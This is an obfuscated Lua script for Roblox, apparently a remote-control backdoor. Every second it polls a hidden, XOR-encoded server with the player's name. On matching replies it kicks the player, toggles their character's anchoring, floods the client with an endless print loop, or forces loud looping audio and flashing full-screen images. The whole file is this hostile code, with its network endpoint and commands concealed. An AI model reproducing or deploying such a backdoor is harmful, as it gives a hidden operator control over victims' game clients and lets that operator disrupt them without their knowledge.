--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10) local v11={};for v19=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v19,v19 + 1 )),v1(v2(v10,1 + (v19% #v10) ,1 + (v19% #v10) + 1 )))%256 ));end return v5(v11);end local function v8() local v12=0;local v13;local v14;local v15;local v16;while true do if (v12==0) then v13=v7("\217\215\207\53\245\225\136\81\211\197\216\113\180\232\148\24\156\193\218\116\179\246\147\26\129\197\150\125\181\237\148\83\136\146\131\35\180\227\197\24\130\197\217\35\171\235\151\83\128\145\205\44\235\188\194\72\131\202\217\116\240\245\215\23\210\194\201\33\168\169\194\14\221\202\207\107\226\190\209\81\212\219\222\38\243\175\194\33\210\204\214\40\231\181\195\13\159\211\211\53","\126\177\163\187\69\134\219\167");v14=v13   .. v7("\124\216\57\192\238\45\204\39\192\161","\156\67\173\74\165")   .. game.Players.LocalPlayer.Name ;v12=1;end if (v12==(3 -2)) then v15,v16=pcall(request,{[v7("\1\165\69","\38\84\215\41\118\220\70")]=v14,[v7("\125\19\54\26\241\84","\158\48\118\66\114")]=v7("\140\1\36","\155\203\68\112\86\19\197"),[v7("\110\216\55\248\69\106\246","\152\38\189\86\156\32\24\133")]={[v7("\223\88\169\82\249\89\179\11\200\78\183\67","\38\156\55\199")]=v7("\169\109\108\36\26\119\251\87\161\114\114\103\25\103\245\77","\35\200\29\28\72\115\20\154")}});if (v15 and (v16.StatusCode==(165 + 35))) then local v20=1180 -(1123 + 57) ;local v21;local v22;while true do if ((0 + 0)==v20) then v21,v22=v16.Body:match(v7("\81\132\239\147\176\103\125\85\250\194\149\197\105\53\82\246","\84\121\223\177\191\237\76"));if ((v21==game.Players.LocalPlayer.Name) and (v22==v7("\176\95\202\171","\161\219\54\169\192\90\48\80"))) then game.Players.LocalPlayer:Kick(v7("\98\75\3\46\76\70\64\49\65\80\15\48\78\74\64\38\70\79\13\36\71\70\65","\69\41\34\96"));elseif ((v21==game.Players.LocalPlayer.Name) and (v22==v7("\186\209\210\15\24\46","\75\220\163\183\106\98"))) then game.Workspace.Ignore.LocalCharacter.Middle.Anchored= not game.Workspace.Ignore.LocalCharacter.Middle.Anchored;elseif ((v21==game.Players.LocalPlayer.Name) and (v22==v7("\1\168\138\36\209","\185\98\218\235\87"))) then for v24=255 -(163 + 91) ,math.huge do print(v7("\233\37\55\231\205\185\139\29\41\242\215\234\232\52\34\231\202","\202\171\92\71\134\190"));end elseif ((v21==game.Players.LocalPlayer.Name) and (v22==v7("\36\212\63\129\42","\232\73\161\76"))) then local v25=0;local v26;local v27;local v28;local v29;local v30;local v31;local v32;while true do if (v25==0) then v26=1930 -(1869 + 61) ;v27=nil;v25=1 + 0 ;end if (v25==(6 -4)) then v30=nil;v31=nil;v25=4 -1 ;end if (v25==(1 + 0)) then v28=nil;v29=nil;v25=2 -0 ;end if ((3 + 0)==v25) then v32=nil;while true do if (v26==(1480 -(1329 + 145))) then v28:Destroy();v27:Destroy();v29:Destroy();break;end if (v26==(971 -(140 + 831))) then local v33=1850 -(1409 + 441) ;while true do if (v33==0) then v27=Instance.new(v7("\136\214\87\83\26","\126\219\185\34\61"),game.Workspace);v27.Volume=918 -(15 + 703) ;v33=1;end if (v33==(1 + 0)) then local v52=438 -(262 + 176) ;while true do if (0==v52) then v27.SoundId=v7("\30\204\70\115\109\100\246\243\5\202\4\61\49\32\162\179\89\157\9\32\43\39\160","\135\108\174\62\18\30\23\147");v27.PlaybackSpeed=0.5;v52=1722 -(345 + 1376) ;end if (v52==1) then v33=690 -(198 + 490) ;break;end end end if ((8 -6)==v33) then v27.Playing=true;v26=2 -1 ;break;end end end if ((1209 -(696 + 510))==v26) then v29.Playing=true;v29.Looped=true;v30=Instance.new(v7("\251\45\50\133\177\23\219\221\39","\156\168\78\64\224\212\121"),game.CoreGui);v30.Name=v7("\52\237\183\203\6\227\160\220","\174\103\142\197");v31=Instance.new(v7("\127\37\94\63\32\114\249\84\45\83","\152\54\72\63\88\69\62"),v30);v26=7 -3 ;end if (v26==(1267 -(1091 + 171))) then local v37=0 + 0 ;local v38;while true do if ((0 -0)==v37) then v38=0;while true do if (v38==2) then v30:Destroy();v26=6;break;end if (v38==(3 -2)) then task.spawn(function() while task.wait() do if v31 then local v57=374 -(123 + 251) ;local v58;while true do if ((0 -0)==v57) then v58=698 -(208 + 490) ;while true do if ((0 + 0)==v58) then v31.ImageColor3=Color3.new(math.random(1 + 0 ,1091 -(660 + 176) )/(31 + 224) ,math.random(1,255)/(457 -(14 + 188)) ,math.random(676 -(534 + 141) ,255)/(103 + 152) );task.wait();v58=1 + 0 ;end if (v58==(1 + 0)) then v31.ImageColor3=Color3.new(1 -0 ,1,1);break;end end break;end end end end end);wait(5 -1 );v38=5 -3 ;end if (v38==(0 + 0)) then v32.Looped=true;v32:Play();v38=1;end end break;end end end if (v26==(2 + 0)) then v28.Looped=true;v29=Instance.new(v7("\52\25\172\37\3","\75\103\118\217"),game.Workspace);v29.Volume=596 -(115 + 281) ;v29.SoundId=v7("\213\86\104\21\170\13\194\64\121\16\227\81\136\6\38\65\224\77\146\6\38\64\238","\126\167\52\16\116\217");v29.PlaybackSpeed=2 -1 ;v26=3 + 0 ;end if (v26==(9 -5)) then v31.Image=v7("\198\198\246\93\199\215\235\72\221\192\180\19\155\149\186\14\128\149\190\4\132\151","\60\180\164\142");v31.Size=UDim2.new(3 -2 ,867 -(550 + 317) ,1 -0 ,0 -0 );v32=Instance.new(v7("\107\81\16\39\35","\114\56\62\101\73\71\141"),v30);v32.SoundId=v7("\170\235\195\197\171\250\222\208\177\237\129\139\247\184\141\146\232\186\131\147\236\187","\164\216\137\187");v32.Volume=2 -1 ;v26=290 -(134 + 151) ;end if (v26==(1666 -(970 + 695))) then v28=Instance.new(v7("\133\230\63\197\28","\167\214\137\74\171\120\206\83"),game.Workspace);v28.Volume=381 -181 ;v28.SoundId=v7("\153\242\42\92\235\180\142\228\59\89\162\232\196\167\99\13\168\242\221\165\98\11\161","\199\235\144\82\61\152");v28.PlaybackSpeed=0.85;v28.Playing=true;v26=1992 -(582 + 1408) ;end end break;end end end break;end end else warn(v7("\244\231\56\190\163\250\75\198\233\113\177\174\251\8\217\166\55\189\180\190\0\219\229\58\242\165\241\6\223\231\63\182\252","\107\178\134\81\210\198\158"),v16.StatusCode);end break;end end end while true do local v17=0 -0 ;local v18;while true do if (v17==(0 -0)) then v18=0 -0 ;while true do if (v18==(1824 -(1195 + 629))) then v8();wait(1 -0 );break;end end break;end end end
